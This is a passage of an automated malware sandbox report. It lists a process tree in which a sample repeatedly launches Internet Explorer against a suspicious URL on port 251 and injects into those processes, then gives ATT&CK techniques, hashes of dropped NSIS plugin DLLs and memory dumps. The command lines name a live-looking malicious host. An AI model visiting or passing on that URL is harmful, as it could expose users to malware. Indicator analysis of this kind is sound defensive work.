  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17414 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3120
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:82948 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3888
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17420 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:480
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17436 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1988
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17446 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2248
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17460 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3324
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3464 CREDAT:17470 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3980
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5056
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    PID:856
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    PID:3112
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4124
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    PID:1984
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    PID:4084
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    PID:4404
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a6&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a6&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    PID:3132
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a7&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a7&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    PID:1448
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a8&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a8&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    PID:4404
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a9&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  PID:4868
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a9&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    PID:2808
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a10&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  PID:4536
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a10&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    - Modifies Internet Explorer settings
    PID:4560
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a11&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
  2⤵
  PID:5012
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a11&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\37226c2a7bdf8087f947c8303539cd4d17d933a08ee196413aaea78a2604c7f5&a64852def0cd3372a256db34473567272b10e818
    3⤵
    PID:1096
- C:\Windows\SysWOW64\explorer.exe
  explorer.exe
  2⤵
  PID:2808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\InetLoad.dll

Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\InetLoad.dll

Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\Math.dll

Filesize
66KB

MD5
9eb6cecdd0df9fe32027fcdb51c625af

SHA1
52b5b054ff6e7325c3087822901ea2f2c4f9572a

SHA256
54cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560

SHA512
864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\Math.dll

Filesize
66KB

MD5
9eb6cecdd0df9fe32027fcdb51c625af

SHA1
52b5b054ff6e7325c3087822901ea2f2c4f9572a

SHA256
54cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560

SHA512
864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\SelfDel.dll

Filesize
4KB

MD5
5e14f6774c43bdff6ffe0afb0d51c47f

SHA1
fb1e7b6e63afa6db6aa2033b5e7e90f1f4ba5e27

SHA256
7cb51ccf21655e9590a6c3232920b16a3dfef15ffe9df7b8e71f487ca8c24da9

SHA512
6ac533c0485156a68bd1460d8219acf7539b766590910cd646f4d7d4572c072f45369712d88d4e698f4e94aead8082abcbfacc3d6fe890046898f6c6d85274e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\SelfDel.dll

Filesize
4KB

MD5
5e14f6774c43bdff6ffe0afb0d51c47f

SHA1
fb1e7b6e63afa6db6aa2033b5e7e90f1f4ba5e27

SHA256
7cb51ccf21655e9590a6c3232920b16a3dfef15ffe9df7b8e71f487ca8c24da9

SHA512
6ac533c0485156a68bd1460d8219acf7539b766590910cd646f4d7d4572c072f45369712d88d4e698f4e94aead8082abcbfacc3d6fe890046898f6c6d85274e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\System.dll

Filesize
11KB

MD5
00a0194c20ee912257df53bfe258ee4a

SHA1
d7b4e319bc5119024690dc8230b9cc919b1b86b2

SHA256
dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3

SHA512
3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\inetc.dll

Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\inetc.dll

Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\inetc.dll

Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\inetc.dll

Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\time.dll

Filesize
10KB

MD5
38977533750fe69979b2c2ac801f96e6

SHA1
74643c30cda909e649722ed0c7f267903558e92a

SHA256
b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35

SHA512
e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsjB7EC.tmp\time.dll

Filesize
10KB

MD5
38977533750fe69979b2c2ac801f96e6

SHA1
74643c30cda909e649722ed0c7f267903558e92a

SHA256
b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35

SHA512
e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53

Download Submit
memory/3632-144-0x0000000002821000-0x0000000002823000-memory.dmp

Filesize
8KB

Download
memory/3632-147-0x0000000003301000-0x0000000003303000-memory.dmp

Filesize
8KB

Download
memory/3632-138-0x0000000002821000-0x0000000002824000-memory.dmp

Filesize
12KB

Download
memory/3632-135-0x0000000002800000-0x000000000281A000-memory.dmp

Filesize
104KB

Download